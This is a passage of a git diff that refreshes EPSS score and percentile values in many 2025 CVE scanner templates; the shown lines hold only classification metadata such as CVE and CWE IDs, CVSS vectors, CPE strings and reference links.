CVE-2025-47813 cwe-id: CWE-209 cvss-score: 5.3 diff --git a/http/cves/2025/CVE-2025-48703.yaml b/http/cves/2025/CVE-2025-48703.yaml index fc07c950bda..65c5e5de192 100644 --- a/http/cves/2025/CVE-2025-48703.yaml +++ b/http/cves/2025/CVE-2025-48703.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.0 cve-id: CVE-2025-48703 epss-score: 0.60904 - epss-percentile: 0.98231 + epss-percentile: 0.9823 cwe-id: CWE-78 metadata: verified: false diff --git a/http/cves/2025/CVE-2025-48828.yaml b/http/cves/2025/CVE-2025-48828.yaml index bb0df21b381..f75a6ec34ae 100644 --- a/http/cves/2025/CVE-2025-48828.yaml +++ b/http/cves/2025/CVE-2025-48828.yaml @@ -17,7 +17,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-48828 classification: epss-score: 0.73998 - epss-percentile: 0.98782 + epss-percentile: 0.98781 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 diff --git a/http/cves/2025/CVE-2025-48954.yaml b/http/cves/2025/CVE-2025-48954.yaml index 61ad3953822..200de551070 100644 --- a/http/cves/2025/CVE-2025-48954.yaml +++ b/http/cves/2025/CVE-2025-48954.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2025-48954 cwe-id: CWE-79 epss-score: 0.15576 - epss-percentile: 0.94472 + epss-percentile: 0.9447 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N cvss-score: 8.1 cpe: cpe:2.3:a:discourse:discourse:*:*:*:*:*:*:*:* diff --git a/http/cves/2025/CVE-2025-49029.yaml b/http/cves/2025/CVE-2025-49029.yaml index bab5af97a37..e877746cab1 100644 --- a/http/cves/2025/CVE-2025-49029.yaml +++ b/http/cves/2025/CVE-2025-49029.yaml @@ -15,7 +15,7 @@ info: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-login-and-signup-widget/custom-login-and-signup-widget-10-authenticated-administrator-remote-code-execution classification: epss-score: 0.0021 - epss-percentile: 0.43508 + epss-percentile: 0.43469 metadata: verified: true max-request: 3 diff --git a/http/cves/2025/CVE-2025-49113.yaml b/http/cves/2025/CVE-2025-49113.yaml index f1881eae994..6e13bb7fe42 100644 --- a/http/cves/2025/CVE-2025-49113.yaml +++ b/http/cves/2025/CVE-2025-49113.yaml @@ -24,8 +24,8 @@ info: cvss-score: 9.9 cve-id: CVE-2025-49113 cwe-id: CWE-502 - epss-score: 0.90405 - epss-percentile: 0.99586 + epss-score: 0.92106 + epss-percentile: 0.99691 metadata: verified: true max-request: 3 diff --git a/http/cves/2025/CVE-2025-49493.yaml b/http/cves/2025/CVE-2025-49493.yaml index 8de384dfca7..2b98c651d08 100644 --- a/http/cves/2025/CVE-2025-49493.yaml +++ b/http/cves/2025/CVE-2025-49493.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-49493 classification: epss-score: 0.0263 - epss-percentile: 0.8529 + epss-percentile: 0.85286 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.1 cve-id: CVE-2025-49493 diff --git a/http/cves/2025/CVE-2025-49596.yaml b/http/cves/2025/CVE-2025-49596.yaml index bdb19e1788b..6d59cbd01a1 100644 --- a/http/cves/2025/CVE-2025-49596.yaml +++ b/http/cves/2025/CVE-2025-49596.yaml @@ -16,8 +16,8 @@ info: - https://github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g - https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596 classification: - epss-score: 0.03596 - epss-percentile: 0.87414 + epss-score: 0.04124 + epss-percentile: 0.88302 metadata: verified: true fofa-query: title="MCP Inspector" diff --git a/http/cves/2025/CVE-2025-49706.yaml b/http/cves/2025/CVE-2025-49706.yaml index 8cc81f7d399..d1d16df9272 100644 --- a/http/cves/2025/CVE-2025-49706.yaml +++ b/http/cves/2025/CVE-2025-49706.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2025-49706 - epss-score: 0.71161 - epss-percentile: 0.98662 + epss-score: 0.72129 + epss-percentile: 0.98701 cwe-id: CWE-287 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-49825.yaml b/http/cves/2025/CVE-2025-49825.yaml index ff33efee8b3..060c3454962 100644 --- a/http/cves/2025/CVE-2025-49825.yaml +++ b/http/cves/2025/CVE-2025-49825.yaml @@ -13,7 +13,7 @@ info: classification: cve-id: CVE-2025-49825 epss-score: 0.11526 - epss-percentile: 0.93413 + epss-percentile: 0.93407 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 reference: diff --git a/http/cves/2025/CVE-2025-5086.yaml b/http/cves/2025/CVE-2025-5086.yaml index bdec3801b49..d03ae00ea3a 100644 --- a/http/cves/2025/CVE-2025-5086.yaml +++ b/http/cves/2025/CVE-2025-5086.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-5086 cwe-id: CWE-502 epss-score: 0.45387 - epss-percentile: 0.97499 + epss-percentile: 0.97494 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-51482.yaml b/http/cves/2025/CVE-2025-51482.yaml index 4be318b7311..0a28582f3a3 100644 --- a/http/cves/2025/CVE-2025-51482.yaml +++ b/http/cves/2025/CVE-2025-51482.yaml @@ -20,7 +20,7 @@ info: cvss-score: 8.8 cve-id: CVE-2025-51482 epss-score: 0.06813 - epss-percentile: 0.91065 + epss-percentile: 0.91066 cwe-id: CWE-94 cpe: cpe:2.3:a:letta:letta:0.7.12:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-51991.yaml b/http/cves/2025/CVE-2025-51991.yaml index eb2f12fa0ad..77f93ba5341 100644 --- a/http/cves/2025/CVE-2025-51991.yaml +++ b/http/cves/2025/CVE-2025-51991.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.1 cve-id: CVE-2025-51991 epss-score: 0.01984 - epss-percentile: 0.83167 + epss-percentile: 0.83165 cwe-id: CWE-94 metadata: max-request: 5 diff --git a/http/cves/2025/CVE-2025-52207.yaml b/http/cves/2025/CVE-2025-52207.yaml index 6cae5465271..d272317d11b 100644 --- a/http/cves/2025/CVE-2025-52207.yaml +++ b/http/cves/2025/CVE-2025-52207.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2025-52207 cwe-id: CWE-23 epss-score: 0.05804 - epss-percentile: 0.90231 + epss-percentile: 0.90232 metadata: vendor: miko product: mikopbx diff --git a/http/cves/2025/CVE-2025-52472.yaml b/http/cves/2025/CVE-2025-52472.yaml index 19601f7235d..b4393897522 100644 --- a/http/cves/2025/CVE-2025-52472.yaml +++ b/http/cves/2025/CVE-2025-52472.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2025-52472 epss-score: 0.00513 - epss-percentile: 0.65951 + epss-percentile: 0.65935 cwe-id: CWE-89 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-52488.yaml b/http/cves/2025/CVE-2025-52488.yaml index 8a06c448352..31d6d005279 100644 --- a/http/cves/2025/CVE-2025-52488.yaml +++ b/http/cves/2025/CVE-2025-52488.yaml @@ -20,7 +20,7 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* epss-score: 0.25441 - epss-percentile: 0.96045 + epss-percentile: 0.96048 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-52665.yaml b/http/cves/2025/CVE-2025-52665.yaml index f0f901c5406..567b547213b 100644 --- a/http/cves/2025/CVE-2025-52665.yaml +++ b/http/cves/2025/CVE-2025-52665.yaml @@ -19,7 +19,7 @@ info: cvss-score: 10 cve-id: CVE-2025-52665 epss-score: 0.10557 - epss-percentile: 0.93052 + epss-percentile: 0.93046 cwe-id: CWE-306 metadata: max-request: 2 diff --git a/http/cves/2025/CVE-2025-5287.yaml b/http/cves/2025/CVE-2025-5287.yaml index a9756f6e1df..5fe73d534f4 100644 --- a/http/cves/2025/CVE-2025-5287.yaml +++ b/http/cves/2025/CVE-2025-5287.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-5287 cwe-id: CWE-89 epss-score: 0.19237 - epss-percentile: 0.95165 + epss-percentile: 0.95163 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-52970.yaml b/http/cves/2025/CVE-2025-52970.yaml index e97bd3bc99c..12ad532b1f0 100644 --- a/http/cves/2025/CVE-2025-52970.yaml +++ b/http/cves/2025/CVE-2025-52970.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2025-52970 - epss-score: 0.30773 - epss-percentile: 0.9658 + epss-score: 0.36961 + epss-percentile: 0.97025 cwe-id: CWE-223 cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-5301.yaml b/http/cves/2025/CVE-2025-5301.yaml index b83b0034e19..59a9b758146 100644 --- a/http/cves/2025/CVE-2025-5301.yaml +++ b/http/cves/2025/CVE-2025-5301.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2025-5301 cwe-id: CWE-79 epss-score: 0.04833 - epss-percentile: 0.89206 + epss-percentile: 0.89203 metadata: verified: false tags: cve,cve2025,onlyoffice,xss,vuln,seclists diff --git a/http/cves/2025/CVE-2025-53770.yaml b/http/cves/2025/CVE-2025-53770.yaml index e377a1b5e85..f8b22290168 100644 --- a/http/cves/2025/CVE-2025-53770.yaml +++ b/http/cves/2025/CVE-2025-53770.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-53770 - epss-score: 0.89607 - epss-percentile: 0.99536 + epss-score: 0.9157 + epss-percentile: 0.99653 cwe-id: CWE-502 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-53771.yaml b/http/cves/2025/CVE-2025-53771.yaml index 791a689a87a..e4de35e0f67 100644 --- a/http/cves/2025/CVE-2025-53771.yaml +++ b/http/cves/2025/CVE-2025-53771.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2025-53771 - epss-score: 0.44417 - epss-percentile: 0.97445 + epss-score: 0.59133 + epss-percentile: 0.98158 cwe-id: CWE-287 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-53833.yaml b/http/cves/2025/CVE-2025-53833.yaml index 2facb29b4a8..1cec3c9e850 100644 --- a/http/cves/2025/CVE-2025-53833.yaml +++ b/http/cves/2025/CVE-2025-53833.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-53833 classification: epss-score: 0.16757 - epss-percentile: 0.94736 + epss-percentile: 0.94733 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cve-id: CVE-2025-53833 diff --git a/http/cves/2025/CVE-2025-54251.yaml b/http/cves/2025/CVE-2025-54251.yaml index 172861d5210..be59f78f32f 100644 --- a/http/cves/2025/CVE-2025-54251.yaml +++ b/http/cves/2025/CVE-2025-54251.yaml @@ -19,7 +19,7 @@ info: cvss-score: 4.3 cve-id: CVE-2025-54251 epss-score: 0.14682 - epss-percentile: 0.94278 + epss-percentile: 0.94274 cwe-id: CWE-91 cpe: cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-54589.yaml b/http/cves/2025/CVE-2025-54589.yaml index eb6c9cc300a..7e3348d3506 100644 --- a/http/cves/2025/CVE-2025-54589.yaml +++ b/http/cves/2025/CVE-2025-54589.yaml @@ -20,7 +20,7 @@ info: cvss-score: 6.3 cve-id: CVE-2025-54589 epss-score: 0.00619 - epss-percentile: 0.69462 + epss-percentile: 0.6945 cwe-id: CWE-79 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-54782.yaml b/http/cves/2025/CVE-2025-54782.yaml index eb2b92e9864..ce9582c23b0 100644 --- a/http/cves/2025/CVE-2025-54782.yaml +++ b/http/cves/2025/CVE-2025-54782.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.4 cve-id: CVE-2025-54782 epss-score: 0.17543 - epss-percentile: 0.94871 + epss-percentile: 0.9487 cwe-id: CWE-77,CWE-352,CWE-78 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-55161.yaml b/http/cves/2025/CVE-2025-55161.yaml index c850fbb43f2..68adcb9971a 100644 --- a/http/cves/2025/CVE-2025-55161.yaml +++ b/http/cves/2025/CVE-2025-55161.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2025-55161 cwe-id: CWE-918 epss-score: 0.02719 - epss-percentile: 0.85523 + epss-percentile: 0.8552 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-55182.yaml b/http/cves/2025/CVE-2025-55182.yaml index e711678d6a4..0aa61ef8fb2 100644 --- a/http/cves/2025/CVE-2025-55182.yaml +++ b/http/cves/2025/CVE-2025-55182.yaml @@ -26,8 +26,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2025-55182 - epss-score: 0.5512 - epss-percentile: 0.97973 + epss-score: 0.62327 + epss-percentile: 0.98295 cwe-id: CWE-502 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-5569.yaml b/http/cves/2025/CVE-2025-5569.yaml index d2e326c9d91..90d252045e3 100644 --- a/http/cves/2025/CVE-2025-5569.yaml +++ b/http/cves/2025/CVE-2025-5569.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-5569 classification: epss-score: 0.00604 - epss-percentile: 0.68989 + epss-percentile: 0.68977 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-5569 diff --git a/http/cves/2025/CVE-2025-55748.yaml b/http/cves/2025/CVE-2025-55748.yaml index a39cca13e0e..70d95dd4de9 100644 --- a/http/cves/2025/CVE-2025-55748.yaml +++ b/http/cves/2025/CVE-2025-55748.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2025-55748 epss-score: 0.01252 - epss-percentile: 0.78919 + epss-percentile: 0.78915 cwe-id: CWE-23 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-55749.yaml b/http/cves/2025/CVE-2025-55749.yaml index 40f493f9a1f..0b66bdc9a3f 100644 --- a/http/cves/2025/CVE-2025-55749.yaml +++ b/http/cves/2025/CVE-2025-55749.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2025-55749 epss-score: 0.00938 - epss-percentile: 0.75732 + epss-percentile: 0.75724 cwe-id: CWE-284 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-56819.yaml b/http/cves/2025/CVE-2025-56819.yaml index 602dbf8adf2..75624d35e3e 100644 --- a/http/cves/2025/CVE-2025-56819.yaml +++ b/http/cves/2025/CVE-2025-56819.yaml @@ -14,8 +14,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-56819 - epss-score: 0.1996 - epss-percentile: 0.95277 + epss-score: 0.21828 + epss-percentile: 0.95577 cwe-id: CWE-78 cpe: cpe:2.3:a:running-elephant:datart:1.0.0:rc3:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-5701.yaml b/http/cves/2025/CVE-2025-5701.yaml index 3cb2df2aeed..3e8f2bd9d08 100644 --- a/http/cves/2025/CVE-2025-5701.yaml +++ b/http/cves/2025/CVE-2025-5701.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2025-5701 epss-score: 0.12932 - epss-percentile: 0.93841 + epss-percentile: 0.93837 cwe-id: CWE-862 metadata: verified: false diff --git a/http/cves/2025/CVE-2025-5777.yaml b/http/cves/2025/CVE-2025-5777.yaml index dfd08464aba..a0f211ea784 100644 --- a/http/cves/2025/CVE-2025-5777.yaml +++ b/http/cves/2025/CVE-2025-5777.yaml @@ -15,8 +15,8 @@ info: - https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/ - https://nvd.nist.gov/vuln/detail/CVE-2025-5777 classification: - epss-score: 0.77205 - epss-percentile: 0.98924 + epss-score: 0.77305 + epss-percentile: 0.98929 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-57819.yaml b/http/cves/2025/CVE-2025-57819.yaml index c7576c6f1a5..caf219b6bcf 100644 --- a/http/cves/2025/CVE-2025-57819.yaml +++ b/http/cves/2025/CVE-2025-57819.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2025-57819 epss-score: 0.81282 - epss-percentile: 0.9913 + epss-percentile: 0.99131 cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:* reference: - https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h diff --git a/http/cves/2025/CVE-2025-57822.yaml b/http/cves/2025/CVE-2025-57822.yaml index aa0ac067d54..543a0298b36 100644 --- a/http/cves/2025/CVE-2025-57822.yaml +++ b/http/cves/2025/CVE-2025-57822.yaml @@ -19,7 +19,7 @@ info: cvss-score: 6.5 cve-id: CVE-2025-57822 epss-score: 0.05353 - epss-percentile: 0.89788 + epss-percentile: 0.89785 cwe-id: CWE-918 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-58179.yaml b/http/cves/2025/CVE-2025-58179.yaml index 808c6303340..fc7c815c459 100755 --- a/http/cves/2025/CVE-2025-58179.yaml +++ b/http/cves/2025/CVE-2025-58179.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2025-58179 - epss-score: 0.00759 - epss-percentile: 0.72811 + epss-score: 0.00424 + epss-percentile: 0.61643 cwe-id: CWE-918 cpe: cpe:2.3:a:withastro:astro:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-58434.yaml b/http/cves/2025/CVE-2025-58434.yaml index d8ffa9a4178..89c9481feb7 100644 --- a/http/cves/2025/CVE-2025-58434.yaml +++ b/http/cves/2025/CVE-2025-58434.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2025-58434 epss-score: 0.08177 - epss-percentile: 0.91936 + epss-percentile: 0.91933 cwe-id: CWE-306 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-58443.yaml b/http/cves/2025/CVE-2025-58443.yaml index 4e713eaeb9e..4d5a29d5812 100644 --- a/http/cves/2025/CVE-2025-58443.yaml +++ b/http/cves/2025/CVE-2025-58443.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2025-58443 - epss-score: 0.08226 - epss-percentile: 0.9196 + epss-score: 0.14086 + epss-percentile: 0.94141 cwe-id: CWE-287 metadata: max-request: 3 diff --git a/http/cves/2025/CVE-2025-58751.yaml b/http/cves/2025/CVE-2025-58751.yaml index cc2c2a2f0b8..9306a0ff72c 100644 --- a/http/cves/2025/CVE-2025-58751.yaml +++ b/http/cves/2025/CVE-2025-58751.yaml @@ -16,7 +16,7 @@ info: classification: cve-id: CVE-2025-58751 epss-score: 0.01925 - epss-percentile: 0.82933 + epss-percentile: 0.8293 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.3 cwe-id: CWE-22 diff --git a/http/cves/2025/CVE-2025-59049.yaml b/http/cves/2025/CVE-2025-59049.yaml index c0ef252de63..37182efa47c 100644 --- a/http/cves/2025/CVE-2025-59049.yaml +++ b/http/cves/2025/CVE-2025-59049.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2025-59049 epss-score: 0.04543 - epss-percentile: 0.88847 + epss-percentile: 0.88845 cwe-id: CWE-22 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-59287.yaml b/http/cves/2025/CVE-2025-59287.yaml index 7f4e457e3a9..2e8f39dbcb8 100644 --- a/http/cves/2025/CVE-2025-59287.yaml +++ b/http/cves/2025/CVE-2025-59287.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2025-59287 cwe-id: CWE-502 - epss-score: 0.77979 - epss-percentile: 0.98963 + epss-score: 0.7353 + epss-percentile: 0.9876 cpe: cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-5961.yaml b/http/cves/2025/CVE-2025-5961.yaml index cdd1b3850b1..a30c8c9a4eb 100644 --- a/http/cves/2025/CVE-2025-5961.yaml +++ b/http/cves/2025/CVE-2025-5961.yaml @@ -15,7 +15,7 @@ info: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpvivid-backuprestore/migration-backup-staging-wpvivid-backup-migration-09116-authenticated-administrator-arbitrary-file-upload classification: epss-score: 0.02035 - epss-percentile: 0.83368 + epss-percentile: 0.83364 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2025-5961 diff --git a/http/cves/2025/CVE-2025-6058.yaml b/http/cves/2025/CVE-2025-6058.yaml index fb7acdf45a6..8f0e2d32cb1 100644 --- a/http/cves/2025/CVE-2025-6058.yaml +++ b/http/cves/2025/CVE-2025-6058.yaml @@ -15,7 +15,7 @@ info: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpbookit/wpbookit-104-unauthenticated-arbitrary-file-upload classification: epss-score: 0.22759 - epss-percentile: 0.95686 + epss-percentile: 0.95691 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-6174.yaml b/http/cves/2025/CVE-2025-6174.yaml index af8baa5b539..e9170df860a 100644 --- a/http/cves/2025/CVE-2025-6174.yaml +++ b/http/cves/2025/CVE-2025-6174.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2025-6174 - epss-score: 0.00712 - epss-percentile: 0.71806 + epss-score: 0.00965 + epss-percentile: 0.76067 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-61884.yaml b/http/cves/2025/CVE-2025-61884.yaml index 5b834ca87cc..fcd7ed4cc1c 100644 --- a/http/cves/2025/CVE-2025-61884.yaml +++ b/http/cves/2025/CVE-2025-61884.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2025-61884 cwe-id: CWE-918 - epss-score: 0.41772 - epss-percentile: 0.97306 + epss-score: 0.44016 + epss-percentile: 0.97423 cpe: cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-6204.yaml b/http/cves/2025/CVE-2025-6204.yaml index 409e03acd3a..28c5e098f67 100644 --- a/http/cves/2025/CVE-2025-6204.yaml +++ b/http/cves/2025/CVE-2025-6204.yaml @@ -21,7 +21,7 @@ info: classification: cve-id: CVE-2025-6204 epss-score: 0.08733 - epss-percentile: 0.92248 + epss-percentile: 0.92242 cwe-id: CWE-94 cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" cvss-score: 9.0 diff --git a/http/cves/2025/CVE-2025-6205.yaml b/http/cves/2025/CVE-2025-6205.yaml index b258ff433ca..b85576196b3 100644 --- a/http/cves/2025/CVE-2025-6205.yaml +++ b/http/cves/2025/CVE-2025-6205.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" cvss-score: 8.8 cve-id: CVE-2025-6205 - epss-score: 0.63215 - epss-percentile: 0.9833 + epss-score: 0.5108 + epss-percentile: 0.97775 cwe-id: CWE-862 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-63387.yaml b/http/cves/2025/CVE-2025-63387.yaml index 58b2958b57a..d1ec961191c 100644 --- a/http/cves/2025/CVE-2025-63387.yaml +++ b/http/cves/2025/CVE-2025-63387.yaml @@ -14,8 +14,8 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-63387 classification: cve-id: CVE-2025-63387 - epss-score: 0.04115 - epss-percentile: 0.8829 + epss-score: 0.06799 + epss-percentile: 0.91057 cwe-id: CWE-287 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-6403.yaml b/http/cves/2025/CVE-2025-6403.yaml index bd08dc38a1e..c99a870366b 100644 --- a/http/cves/2025/CVE-2025-6403.yaml +++ b/http/cves/2025/CVE-2025-6403.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2025-6403 cwe-id: CWE-74 epss-score: 0.00577 - epss-percentile: 0.68219 + epss-percentile: 0.68207 cpe: cpe:2.3:a:code-projects:school_fees_payment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-66472.yaml b/http/cves/2025/CVE-2025-66472.yaml index 3a94f6f87ff..0c03bfe5f48 100644 --- a/http/cves/2025/CVE-2025-66472.yaml +++ b/http/cves/2025/CVE-2025-66472.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2025-66472 - epss-score: 0.00054 - epss-percentile: 0.17368 + epss-score: 0.00017 + epss-percentile: 0.03352 cwe-id: CWE-80 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-6851.yaml b/http/cves/2025/CVE-2025-6851.yaml index 7fafaf893ab..ec84fd6a874 100644 --- a/http/cves/2025/CVE-2025-6851.yaml +++ b/http/cves/2025/CVE-2025-6851.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2025-6851 cwe-id: CWE-918 - epss-score: 0.01556 - epss-percentile: 0.81037 + epss-score: 0.0167 + epss-percentile: 0.81681 cpe: cpe:2.3:a:broken_link_notifier_project:broken_link_notifier:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-68613.yaml b/http/cves/2025/CVE-2025-68613.yaml index 4465914a947..305c6d1b7c5 100644 --- a/http/cves/2025/CVE-2025-68613.yaml +++ b/http/cves/2025/CVE-2025-68613.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2025-68613 - epss-score: 0.6349 - epss-percentile: 0.98343 + epss-score: 0.63782 + epss-percentile: 0.98357 cwe-id: CWE-94 metadata: vendor: n8n diff --git a/http/cves/2025/CVE-2025-69200.yaml b/http/cves/2025/CVE-2025-69200.yaml index 163d4d4dba5..e41fc204dcf 100644 --- a/http/cves/2025/CVE-2025-69200.yaml +++ b/http/cves/2025/CVE-2025-69200.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2025-69200 - epss-score: 0.05286 - epss-percentile: 0.89705 + epss-score: 0.02038 + epss-percentile: 0.83376 cwe-id: CWE-202 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-6970.yaml b/http/cves/2025/CVE-2025-6970.yaml index be5067b1047..5916a7ffffa 100644 --- a/http/cves/2025/CVE-2025-6970.yaml +++ b/http/cves/2025/CVE-2025-6970.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2025-6970 cwe-id: CWE-89 - epss-score: 0.29945 - epss-percentile: 0.96503 + epss-score: 0.24366 + epss-percentile: 0.95928 cpe: cpe:2.3:a:wp-events-plugin:events_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-7160.yaml b/http/cves/2025/CVE-2025-7160.yaml index fd9b8d91f5a..00f303cd8bb 100644 --- a/http/cves/2025/CVE-2025-7160.yaml +++ b/http/cves/2025/CVE-2025-7160.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2025-7160 - epss-score: 0.01666 - epss-percentile: 0.81673 + epss-score: 0.01624 + epss-percentile: 0.81424 cwe-id: CWE-89 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-8848.yaml b/http/cves/2025/CVE-2025-8848.yaml index c431d170d20..1dfd764198a 100644 --- 